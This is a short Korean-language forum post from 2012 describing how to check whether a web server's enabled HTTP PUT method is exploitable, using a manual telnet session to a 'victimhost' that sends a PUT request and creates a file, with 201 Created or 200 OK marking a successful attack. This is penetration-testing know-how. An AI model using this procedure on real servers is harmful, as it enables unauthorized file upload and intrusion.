BACKRUSH  대화방입장  유닉스명령  다음  자료실  Ascii Table   Exploit   원격접속  달력,시간   프로세스  
지하철노선   Whois   RFC문서   SUN FAQ   SUN FAQ1   C메뉴얼   PHP메뉴얼   너구리   아스키월드 아이피서치

글쓴이: put HTTP method PUT 활용 조회수: 6406



PUT Method가 허용되어 있다 하더라도, 반드시 취약한 것은 아니며, 아래와 같은 테스트
방법을 이용, 점검하여야 한다.
- telnet victimhost httpport[enter]
PUT /파일이름 HTTP/1.1[enter]
Host: victimhost(IP가능)[enter]
Content-Length:컨텐츠 길이[enter]
[enter] : enter를 치게 되면, 서버에서 content를 입력받을 준비를 함. 이때 입력한 컨텐츠가
PUT 뒤에 지정한 파일이름으로 생성됨.
(화면상에 HTTP/1.1 100 Continue가 표시됨, 단, HTTP/1.0에서는 빈화면만 보임)
이후에 생성할 파일의 내용(컨텐츠)를 입력하면 됨. 이때, 길이는 컨텐츠 길이에서 지정한
길이만큼이 입력됨
- 공격이 성공한 경우, 201 Created 또는 200OK로 서버는 응답함

관련글 : 없음 글쓴시간 : 2012/05/23 11:22 from 61.37.250.250

  mysql output file 목록보기 새글 쓰기 지우기 응답글 쓰기 글 수정 mysql을 이용한 root권한  
BACKRUSH  대화방입장  유닉스명령  다음  자료실  Ascii Table   Exploit   원격접속  달력,시간   프로세스  
지하철노선   Whois   RFC문서   SUN FAQ   SUN FAQ1   C메뉴얼   PHP메뉴얼   너구리   아스키월드 아이피서치